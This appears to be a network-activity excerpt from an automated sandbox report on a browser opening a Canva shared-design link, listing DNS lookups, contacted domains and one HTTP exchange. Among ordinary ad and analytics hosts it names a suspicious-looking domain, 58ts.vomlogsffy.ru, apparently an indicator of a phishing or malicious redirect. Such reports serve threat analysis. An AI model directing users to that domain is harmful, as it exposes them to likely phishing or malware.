                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.433943987 CET192.168.2.41.1.1.10xf042Standard query (0)ad.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.434087038 CET192.168.2.41.1.1.10xa99aStandard query (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.519213915 CET192.168.2.41.1.1.10x3d94Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.519349098 CET192.168.2.41.1.1.10x4cc0Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.085773945 CET192.168.2.41.1.1.10xa91Standard query (0)adservice.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.085922003 CET192.168.2.41.1.1.10xcb18Standard query (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.173336029 CET192.168.2.41.1.1.10x477fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.173475027 CET192.168.2.41.1.1.10x4e5bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:45.941687107 CET192.168.2.41.1.1.10xa1cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:45.941925049 CET192.168.2.41.1.1.10x9621Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.579724073 CET192.168.2.41.1.1.10xd8ffStandard query (0)sp.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.579941988 CET192.168.2.41.1.1.10xc036Standard query (0)sp.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.580365896 CET192.168.2.41.1.1.10x1ac9Standard query (0)p.tvpixel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.580496073 CET192.168.2.41.1.1.10x4cfStandard query (0)p.tvpixel.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.632868052 CET192.168.2.41.1.1.10x5c55Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.633117914 CET192.168.2.41.1.1.10xf0dStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.794694901 CET192.168.2.41.1.1.10xfe55Standard query (0)sp.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.794809103 CET192.168.2.41.1.1.10x7c30Standard query (0)sp.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.855607986 CET192.168.2.41.1.1.10x18f0Standard query (0)p.tvpixel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.855736971 CET192.168.2.41.1.1.10xddd8Standard query (0)p.tvpixel.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.381288052 CET192.168.2.41.1.1.10xb7e5Standard query (0)58ts.vomlogsffy.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.381400108 CET192.168.2.41.1.1.10x7b88Standard query (0)58ts.vomlogsffy.ru65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:52.999378920 CET192.168.2.41.1.1.10xd941Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:52.999664068 CET192.168.2.41.1.1.10xe539Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.427222967 CET192.168.2.41.1.1.10xdd98Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.427383900 CET192.168.2.41.1.1.10xfaa7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.667608023 CET192.168.2.41.1.1.10x46d8Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.667731047 CET192.168.2.41.1.1.10x2f56Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.693994045 CET192.168.2.41.1.1.10x97e5Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.694284916 CET192.168.2.41.1.1.10xb98cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.694744110 CET192.168.2.41.1.1.10xf631Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.694972038 CET192.168.2.41.1.1.10x3e4cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.830348969 CET1.1.1.1192.168.2.40x9df1No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:15.833475113 CET1.1.1.1192.168.2.40x7354No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.953663111 CET1.1.1.1192.168.2.40x41a6No error (0)www.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.953663111 CET1.1.1.1192.168.2.40x41a6No error (0)www.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:17.954206944 CET1.1.1.1192.168.2.40x5007No error (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.033956051 CET1.1.1.1192.168.2.40x9a5eNo error (0)static.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.033956051 CET1.1.1.1192.168.2.40x9a5eNo error (0)static.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.033993006 CET1.1.1.1192.168.2.40x8ef2No error (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.316809893 CET1.1.1.1192.168.2.40xd42bNo error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.318221092 CET1.1.1.1192.168.2.40x725No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.318221092 CET1.1.1.1192.168.2.40x725No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.968677044 CET1.1.1.1192.168.2.40x5000No error (0)static.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.968677044 CET1.1.1.1192.168.2.40x5000No error (0)static.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.969404936 CET1.1.1.1192.168.2.40xed32No error (0)static.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.355578899 CET1.1.1.1192.168.2.40x2566No error (0)static.cloudflareinsights.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.355916977 CET1.1.1.1192.168.2.40xaea3No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.355916977 CET1.1.1.1192.168.2.40xaea3No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:22.513468981 CET1.1.1.1192.168.2.40xb1abNo error (0)o13855.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:24.331756115 CET1.1.1.1192.168.2.40x61f3No error (0)o13855.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.354806900 CET1.1.1.1192.168.2.40xad57No error (0)font-public.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.354827881 CET1.1.1.1192.168.2.40xab0bNo error (0)font-public.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:26.354827881 CET1.1.1.1192.168.2.40xab0bNo error (0)font-public.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.355679035 CET1.1.1.1192.168.2.40x668dNo error (0)www.canva.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.355920076 CET1.1.1.1192.168.2.40x55a4No error (0)www.canva.com104.16.102.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:30.355920076 CET1.1.1.1192.168.2.40x55a4No error (0)www.canva.com104.16.103.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.673687935 CET1.1.1.1192.168.2.40x3adcNo error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.680888891 CET1.1.1.1192.168.2.40x7ed5No error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.680888891 CET1.1.1.1192.168.2.40x7ed5No error (0)d1w725hft9421a.cloudfront.net13.226.2.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.680888891 CET1.1.1.1192.168.2.40x7ed5No error (0)d1w725hft9421a.cloudfront.net13.226.2.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.680888891 CET1.1.1.1192.168.2.40x7ed5No error (0)d1w725hft9421a.cloudfront.net13.226.2.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:32.680888891 CET1.1.1.1192.168.2.40x7ed5No error (0)d1w725hft9421a.cloudfront.net13.226.2.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:33.817612886 CET1.1.1.1192.168.2.40xc622No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993067026 CET1.1.1.1192.168.2.40x8115No error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993067026 CET1.1.1.1192.168.2.40x8115No error (0)d1w725hft9421a.cloudfront.net13.226.2.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993067026 CET1.1.1.1192.168.2.40x8115No error (0)d1w725hft9421a.cloudfront.net13.226.2.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993067026 CET1.1.1.1192.168.2.40x8115No error (0)d1w725hft9421a.cloudfront.net13.226.2.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993067026 CET1.1.1.1192.168.2.40x8115No error (0)d1w725hft9421a.cloudfront.net13.226.2.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.993104935 CET1.1.1.1192.168.2.40xcad3No error (0)cdn.metadata.iod1w725hft9421a.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.998440027 CET1.1.1.1192.168.2.40xca24No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.998440027 CET1.1.1.1192.168.2.40xca24No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.998440027 CET1.1.1.1192.168.2.40xca24No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:34.998888016 CET1.1.1.1192.168.2.40x9460No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.929169893 CET1.1.1.1192.168.2.40x1a84No error (0)ct.canva.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.929169893 CET1.1.1.1192.168.2.40x1a84No error (0)ct.canva.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.929169893 CET1.1.1.1192.168.2.40x1a84No error (0)ct.canva.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:35.929169893 CET1.1.1.1192.168.2.40x1a84No error (0)ct.canva.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.834188938 CET1.1.1.1192.168.2.40xd4a0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.834188938 CET1.1.1.1192.168.2.40xd4a0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.834188938 CET1.1.1.1192.168.2.40xd4a0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:36.835081100 CET1.1.1.1192.168.2.40xdf25No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.800302982 CET1.1.1.1192.168.2.40xa11aNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.800342083 CET1.1.1.1192.168.2.40xe2f9No error (0)ad.doubleclick.net142.250.181.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909507990 CET1.1.1.1192.168.2.40x90a8No error (0)ct.canva.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909507990 CET1.1.1.1192.168.2.40x90a8No error (0)ct.canva.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909507990 CET1.1.1.1192.168.2.40x90a8No error (0)ct.canva.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:37.909507990 CET1.1.1.1192.168.2.40x90a8No error (0)ct.canva.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.566735029 CET1.1.1.1192.168.2.40x3188No error (0)adservice.google.com172.217.17.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.566996098 CET1.1.1.1192.168.2.40xf3b8No error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.571073055 CET1.1.1.1192.168.2.40xf042No error (0)ad.doubleclick.net142.250.181.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.571103096 CET1.1.1.1192.168.2.40xa99aNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.656476974 CET1.1.1.1192.168.2.40x3d94No error (0)googleads.g.doubleclick.net172.217.17.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:40.656569958 CET1.1.1.1192.168.2.40x4cc0No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.222732067 CET1.1.1.1192.168.2.40xcb18No error (0)adservice.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.223334074 CET1.1.1.1192.168.2.40xa91No error (0)adservice.google.com142.250.181.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.311136961 CET1.1.1.1192.168.2.40x4e5bNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:43.311695099 CET1.1.1.1192.168.2.40x477fNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:46.079941034 CET1.1.1.1192.168.2.40x9621No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:46.081826925 CET1.1.1.1192.168.2.40xa1cNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.718272924 CET1.1.1.1192.168.2.40xc036No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.769876003 CET1.1.1.1192.168.2.40x5c55No error (0)sb.scorecardresearch.com18.161.69.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.769876003 CET1.1.1.1192.168.2.40x5c55No error (0)sb.scorecardresearch.com18.161.69.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.769876003 CET1.1.1.1192.168.2.40x5c55No error (0)sb.scorecardresearch.com18.161.69.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.769876003 CET1.1.1.1192.168.2.40x5c55No error (0)sb.scorecardresearch.com18.161.69.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.826833010 CET1.1.1.1192.168.2.40xd8ffNo error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.826833010 CET1.1.1.1192.168.2.40xd8ffNo error (0)spdc-global.pbp.gysm.yahoodns.net54.171.122.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.826833010 CET1.1.1.1192.168.2.40xd8ffNo error (0)spdc-global.pbp.gysm.yahoodns.net54.246.144.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.938302994 CET1.1.1.1192.168.2.40x1ac9No error (0)p.tvpixel.com99.83.205.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:47.938302994 CET1.1.1.1192.168.2.40x1ac9No error (0)p.tvpixel.com75.2.57.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.931996107 CET1.1.1.1192.168.2.40xfe55No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.931996107 CET1.1.1.1192.168.2.40xfe55No error (0)spdc-global.pbp.gysm.yahoodns.net54.246.144.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.931996107 CET1.1.1.1192.168.2.40xfe55No error (0)spdc-global.pbp.gysm.yahoodns.net54.171.122.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.932845116 CET1.1.1.1192.168.2.40x7c30No error (0)sp.analytics.yahoo.comspdc-global.pbp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.993181944 CET1.1.1.1192.168.2.40x18f0No error (0)p.tvpixel.com75.2.57.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:49.993181944 CET1.1.1.1192.168.2.40x18f0No error (0)p.tvpixel.com99.83.205.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.840972900 CET1.1.1.1192.168.2.40xb7e5No error (0)58ts.vomlogsffy.ru172.67.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.840972900 CET1.1.1.1192.168.2.40xb7e5No error (0)58ts.vomlogsffy.ru104.21.56.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:50.844031096 CET1.1.1.1192.168.2.40x7b88No error (0)58ts.vomlogsffy.ru65IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:53.140996933 CET1.1.1.1192.168.2.40xd941No error (0)sb.scorecardresearch.com18.161.69.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:53.140996933 CET1.1.1.1192.168.2.40xd941No error (0)sb.scorecardresearch.com18.161.69.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:53.140996933 CET1.1.1.1192.168.2.40xd941No error (0)sb.scorecardresearch.com18.161.69.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:53.140996933 CET1.1.1.1192.168.2.40xd941No error (0)sb.scorecardresearch.com18.161.69.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.564754963 CET1.1.1.1192.168.2.40xdd98No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.564754963 CET1.1.1.1192.168.2.40xdd98No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.564754963 CET1.1.1.1192.168.2.40xdd98No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:55.564754963 CET1.1.1.1192.168.2.40xdd98No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.804826021 CET1.1.1.1192.168.2.40x46d8No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.804826021 CET1.1.1.1192.168.2.40x46d8No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.804826021 CET1.1.1.1192.168.2.40x46d8No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:57.804826021 CET1.1.1.1192.168.2.40x46d8No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.832415104 CET1.1.1.1192.168.2.40xf631No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Dec 19, 2024 22:28:33.834100962 CET1.1.1.1192.168.2.40x97e5No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    • www.canva.com
                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                      • static.canva.com
                                                                                                                                                                                                                                                      • static.cloudflareinsights.com
                                                                                                                                                                                                                                                      • o13855.ingest.sentry.io
                                                                                                                                                                                                                                                      • font-public.canva.com
                                                                                                                                                                                                                                                      • cdn.metadata.io
                                                                                                                                                                                                                                                      • api.ipify.org
                                                                                                                                                                                                                                                      • ct.canva.com
                                                                                                                                                                                                                                                      • ad.doubleclick.net
                                                                                                                                                                                                                                                      • googleads.g.doubleclick.net
                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                      • sp.analytics.yahoo.com
                                                                                                                                                                                                                                                      • p.tvpixel.com
                                                                                                                                                                                                                                                      • sb.scorecardresearch.com
                                                                                                                                                                                                                                                      • 58ts.vomlogsffy.ru
                                                                                                                                                                                                                                                      • code.jquery.com
                                                                                                                                                                                                                                                    • a.nel.cloudflare.com
                                                                                                                                                                                                                                                    • adservice.google.com
                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    0192.168.2.449740104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC809OUTGET /design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:19 UTC1212INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:19 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79db8e0a727a-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Set-Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; Path=/; Max-Age=31536000; Expires=Fri, 19 Dec 2025 21:27:19 GMT; Secure; HttpOnly; SameSite=NONE
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    content-security-policy: base-uri 'self'; object-src 'none'; script-src 'report-sample' 'strict-dynamic' 'unsafe-eval' 'nonce-cW6p0t0tGJTyklzlXRHG/g'; report-uri https://csp.canva.com/_cspreport?source=web2&requestId=8f4a79db8e0a727a&app=responsive_design_viewer&policyHash=290044a8
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                    x-request-id: 8f4a79db8e0a727a
                                                                                                                                                                                                                                                    x-robots-tag: noindex, nofollow
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Server-Timing: cfCacheStatus;desc="DYNAMIC"
